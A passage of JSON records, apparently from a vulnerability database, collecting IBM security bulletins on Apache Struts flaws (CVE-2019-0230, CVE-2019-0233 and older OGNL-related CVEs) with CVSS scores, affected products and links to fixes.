IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/&lt;efix_name&gt;_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:58:27", "description": "## Summary\n\nApache Struts is used by IBM Call Center as part of its web application framework used for creating Java EE web applications. It is vulnerable to various CVEs, listed below. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 12.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow 